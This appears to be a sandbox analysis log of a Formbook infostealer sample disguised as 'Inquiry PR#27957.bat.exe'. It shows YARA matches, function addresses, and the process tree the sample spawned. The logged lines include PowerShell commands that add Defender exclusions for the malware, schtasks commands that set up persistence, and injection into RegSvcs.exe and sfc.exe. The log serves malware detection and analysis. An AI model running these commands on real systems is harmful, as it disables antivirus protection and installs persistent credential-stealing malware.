            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_069141B010_2_069141B0
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_069141AD10_2_069141AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0110010014_2_01100100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0115600014_2_01156000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011902C014_2_011902C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111053514_2_01110535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0113475014_2_01134750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111077014_2_01110770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0110C7C014_2_0110C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112C6E014_2_0112C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112696214_2_01126962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011129A014_2_011129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111A84014_2_0111A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111284014_2_01112840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114889014_2_01148890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_010F68B814_2_010F68B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0113E8F014_2_0113E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0110EA8014_2_0110EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111AD0014_2_0111AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111ED7A14_2_0111ED7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01128DBF14_2_01128DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01118DC014_2_01118DC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0110ADE014_2_0110ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01110C0014_2_01110C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01100CF214_2_01100CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01130F3014_2_01130F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01152F2814_2_01152F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01184F4014_2_01184F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0118EFA014_2_0118EFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01102FC814_2_01102FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01110E5914_2_01110E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01122E9014_2_01122E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114516C14_2_0114516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_010FF17214_2_010FF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111B1B014_2_0111B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_010FD34C14_2_010FD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011133F314_2_011133F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011152A014_2_011152A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112B2C014_2_0112B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112D2F014_2_0112D2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0110146014_2_01101460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111349714_2_01113497
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011574E014_2_011574E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111B73014_2_0111B730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111995014_2_01119950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112B95014_2_0112B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111599014_2_01115990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0117D80014_2_0117D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011138E014_2_011138E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112FB8014_2_0112FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01185BF014_2_01185BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114DBF914_2_0114DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01183A6C14_2_01183A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01113D4014_2_01113D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112FDC014_2_0112FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01189C3214_2_01189C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01129C2014_2_01129C20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01111F9214_2_01111F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01119EB014_2_01119EB0
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E3EDF116_2_03E3EDF1
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E40BA616_2_03E40BA6
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E40B9D16_2_03E40B9D
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E5F2B616_2_03E5F2B6
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E4788616_2_03E47886
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E4788216_2_03E47882
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E40DC616_2_03E40DC6
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E354B716_2_03E354B7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01677E54 appears 110 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0117EA12 appears 37 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 016AF290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01665130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0161B970 appears 280 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01157E54 appears 97 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0169EA12 appears 86 times
            Source: Inquiry PR#27957.bat.exeStatic PE information: invalid certificate
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1351958774.0000000002F27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1374530515.0000000008D64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevVTR.exe( vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1372644857.0000000007290000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1350638471.00000000010DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1353264199.00000000040FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000000.1323414765.0000000000BB6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevVTR.exe( vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exeBinary or memory string: OriginalFilenamevVTR.exe( vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Inquiry PR#27957.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: fuqwoDzun.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, b9060lgXpIuMEFTtMf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, r3Q1SYRNwEfwp9YRQp.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, r3Q1SYRNwEfwp9YRQp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, r3Q1SYRNwEfwp9YRQp.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, r3Q1SYRNwEfwp9YRQp.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, r3Q1SYRNwEfwp9YRQp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, r3Q1SYRNwEfwp9YRQp.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, b9060lgXpIuMEFTtMf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, b9060lgXpIuMEFTtMf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/16@17/12
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeFile created: C:\Users\user\AppData\Roaming\fuqwoDzun.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2C94.tmpJump to behavior
            Source: Inquiry PR#27957.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Inquiry PR#27957.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1956912870.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3786127793.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1956746019.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3786127793.0000000000BF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Inquiry PR#27957.bat.exeReversingLabs: Detection: 34%
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeFile read: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\fuqwoDzun.exe C:\Users\user\AppData\Roaming\fuqwoDzun.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
